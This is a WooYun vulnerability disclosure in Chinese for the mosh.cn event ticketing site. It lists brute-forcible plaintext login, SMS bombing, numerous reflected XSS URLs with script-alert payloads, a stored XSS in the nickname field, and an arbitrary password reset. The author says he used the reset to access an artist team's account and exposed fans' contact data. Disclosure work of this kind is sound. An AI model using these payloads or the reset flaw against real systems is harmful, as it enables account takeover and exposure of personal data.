当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158201

漏洞标题:魔时网活动易若干安全漏洞打包(任意用户密码重置/泄露门票/储存型XSS/影响全站)

相关厂商:mosh.cn

漏洞作者: kevinchowsec

提交时间:2015-12-04 10:15

修复时间:2016-01-19 12:40

公开时间:2016-01-19 12:40

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-05: 厂商已经确认,细节仅向厂商公开
2015-12-15: 细节向核心白帽子及相关领域专家公开
2015-12-25: 细节向普通白帽子公开
2016-01-04: 细节向实习白帽子公开
2016-01-19: 细节向公众公开

简要描述:

2015-2016李志跨年音乐会票瞬间被买完,看到采用的是活动易(e.mosh.cn)的售票系统。正文有逼哥账号劫持演示。

详细说明:

1、明文传输敏感信息+爆破账户密码;
http://e.mosh.cn/user/ajaxcheckusererr
http://e.mosh.cn/user/dologin
2、短信炸弹
http://e.mosh.cn/user/dofindpwd
http://e.mosh.cn/user/resendmsg
3、XSS跨站攻击;
①反射型(满站都是):
http://e.mosh.cn/user/citylist?jsoncallback=jQuery1720026548518100753427_1448341015069}}b9a4f<script>alert(1)<%2fscript>513d9&a_id=8&_=1448341019799
http://e.mosh.cn/god/getcontent?jsoncallback=jQuery1720026548518100753427_1448341015069}}b9a4f<script>alert(1)<%2fscript>513d9&a_id=8&_=1448341019799
http://e.mosh.cn/user?5c7a6--><script>alert(1)</script>816d0=1
http://e.mosh.cn/user/boundsina?39628"><script>alert(1)<%2fscript>8d908=1
http://e.mosh.cn/user/citylist?jsoncallback=jQuery17201882282157894224_144834055939598715%3balert(1)%2f%2f147&pid=1&_=1448340559798
http://e.mosh.cn/user/editnews?8fda3"><script>alert(1)<%2fscript>59ae1=1
http://e.mosh.cn/user/index?refer=http://e.mosh.cn/user/editnews?8fda3"><script>alert(1)<%2fscript>59ae1=1
http://e.mosh.cn/user/findpwd?28d19"><script>alert(1)</script>ac919=1
http://e.mosh.cn/user/register?refer=http://e.mosh.cn/fd77d--><script>alert(1)</script>bf033
http://e.mosh.cn/user/weaccredit?a339a--><script>alert(1)</script>6da7a=1
②存储型(nickname参数,影响全站,评论哪儿打哪儿):
http://e.mosh.cn/user/editinfo
4、任意用户密码重置。
http://e.mosh.cn/user/dofindpwd

漏洞证明:

详见截图(红字解释、接口地址、附带参数)
1、明文传输敏感信息+爆破账户密码

登录接口_明文传输敏感信息.png


登录接口_爆破账户密码.png


登录接口_爆破账户密码1.png


2、短信炸弹

短信炸弹.png


短信炸弹1.jpg


http://e.mosh.cn/user/sendphonenumbybind
(该接口批量提交提示“{"strtus":"error","msg":"您需要等待1分才可以再次发送"}”)
3、XSS跨站攻击;
①反射型(满站都是):

XSS1.png


②存储型(nickname参数,影响全站,评论哪儿打哪儿):

XSS2.png


XSS3.png


XSS4.png


遍历eid批量评论活动:

XSS5.png


访问活动页面的用户均可触发JS:

XSS6.png


4、任意用户密码重置。

任意密码重置a1.png


任意密码重置a2.png


任意密码重置a3.png


任意密码重置a4.png


社工了一下,找到李志团队的登录账号,重置后可登录,泄露参加音乐会的逼哥粉丝地址和联系电话,还可以验票等操作。

任意密码重置a5.png


任意密码重置a6.png

修复方案:

1、限制用户批量提交数据(IP);
2、传输加密;
3、输入过滤输出转义,cookie加httponly;
4、梳理逻辑,修复重置密码逻辑错误;
5、同样的问题检测旗下其他站点。

版权声明:转载请注明来源 kevinchowsec@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-05 12:33

厂商回复:

漏洞已收到,并且做最快修复

最新状态:

暂无


漏洞评价:

评价